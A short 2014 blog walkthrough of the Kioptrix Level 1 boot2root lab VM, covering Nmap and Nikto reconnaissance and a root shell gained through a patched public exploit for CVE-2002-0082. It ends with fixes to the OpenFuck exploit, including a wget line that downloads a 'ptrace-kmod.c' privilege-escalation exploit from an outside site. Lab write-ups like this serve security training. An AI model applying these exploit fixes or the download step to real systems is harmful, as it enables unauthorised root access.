Monday, May 19, 2014

[WALKTHROUGH] KIOPTRIX Level 1

Kioptrix series are just another B2R (boot2root) VM for security lover... :)

The very first challenge comes from the Level 1 is relatively easy, however I am warned by the author of the Kioptrix that the Level 2 will not be that easier anymore! and CHALLENGE ACCEPTED! :)

Finding the ip address of the target box using Nmap...

Target's IP: 192.168.117.143

Proceed with reconnaissance...



Scanning with Nikto...


Potential risk founded! CVE-2002-0082

Finding the public exploit at exploit-db.com... Fix the exploit and exploit... :)

I would advise try fixing the code on your own, it is really worth the time banging the wall and cracking the head to fix a broken code... However, the changes made on the public exploit code will be revealed at the end of the post...


And, we try attacking with fixed up public exploit...


We got the root shell right away....   :)

Checking out the flag....
 
 Ooops... author says that Level 2 is not going to be easy...    ;) interesting...



!! Fixes to be done on the OpenFuck exploit code !!
[+] Add: #include <openssl/rc4.h>
[+] Add: #include <openssl/md5.h>


[*] Google for "ptrace-kmod.c" and replace the link
[+] wget http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c

No comments:

Post a Comment